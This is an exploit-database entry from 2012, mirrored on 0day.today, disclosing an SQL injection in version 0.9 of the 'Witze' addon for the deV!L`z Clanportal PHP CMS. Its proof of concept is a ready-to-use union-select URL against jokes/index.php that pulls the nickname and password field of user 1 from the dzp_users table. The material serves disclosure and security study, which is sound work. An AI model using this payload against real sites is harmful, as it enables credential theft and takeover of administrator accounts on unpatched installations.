id: 17620
date: 03/04/2012
title: deV!L`z Clanportal Witze Addon Versions 0.9 SQL Injection Vulnerability
author: Easy Laster
cves: 

========================================================================================
| # Title    : deV!L`z Clanportal Witze Addon Versions 0.9 SQL Injection Vulnerability
| # Author   : Easy Laster
| # Download : http://dzcp-zone.de/downloads/?action=show&id=97
| # Script   : Witze Addon Versions 0.9
| # Price    : free
| # Bug      : SQL Injection
| # Date     : 03.03.2012
| # Language : PHP
| # Status   : vulnerable
| # Greetings: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, Dr.Ogen, ezah
======================        Proof of Concept         =================================
   [+] Vulnerability
   jokes/index.php?action=show&id=
   [+] Injectable
   jokes/index.php?action=show&id=9999999999999999999999999999+union+select+1,1,nick,pwd,1,1+from+dzp_users+where+id=1--+



#  0day.today [2023-03-24]  #